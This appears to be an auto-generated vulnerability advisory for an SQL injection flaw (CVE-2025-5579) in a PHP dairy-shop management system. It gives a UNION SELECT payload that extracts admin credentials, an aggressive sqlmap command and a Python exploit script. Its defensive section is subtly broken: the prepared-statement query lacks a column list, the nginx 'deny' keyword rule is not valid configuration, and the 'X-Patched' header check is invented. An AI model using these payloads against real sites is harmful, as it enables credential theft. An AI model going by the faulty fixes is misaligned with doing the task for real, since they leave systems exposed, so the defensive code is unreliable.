PHPGurukul Dairy Farm Shop Management System, SQL Injection, CVE-2025-5579 (Critical)

Listen to this Post

How the Vulnerability Works

The CVE-2025-5579 vulnerability in PHPGurukul Dairy Farm Shop Management System 1.3 allows remote attackers to execute arbitrary SQL queries via the `productname` parameter in /search-product.php. The application fails to sanitize user-supplied input before passing it to SQL queries, enabling injection attacks. An attacker can manipulate the parameter to extract, modify, or delete database contents, potentially compromising admin credentials, customer data, and system integrity. The flaw stems from insecure SQL query construction, where attacker-controlled input is directly concatenated into queries without prepared statements or proper escaping.

DailyCVE Form

Platform: PHPGurukul Dairy Farm
Version: 1.3
Vulnerability: SQL Injection
Severity: Critical
Date: 06/04/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation Analysis

1. Manual Exploit

GET /search-product.php?productname=' UNION SELECT 1,2,3,4,5,concat(username,':',password),7,8 FROM admin-- -

2. SQLmap Command

sqlmap -u "http://target.com/search-product.php?productname=test" --dbs --risk=3

3. Exploit Script (Python)

import requests
target = "http://victim.com/search-product.php"
payload = "' OR 1=1-- -"
r = requests.get(target, params={"productname": payload})
print(r.text)

Protection Measures

1. Input Sanitization

$productname = mysqli_real_escape_string($conn, $_GET['productname']);

2. Prepared Statements

$stmt = $conn->prepare("SELECT FROM products WHERE name = ?");
$stmt->bind_param("s", $_GET['productname']);

3. WAF Rules

location ~ /search-product.php {
deny '|union|select|from|where|--';
}

4. Patch Verification

curl -I http://target.com/ | grep X-Patched

5. Log Monitoring

tail -f /var/log/apache2/access.log | grep 'search-product.php'

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top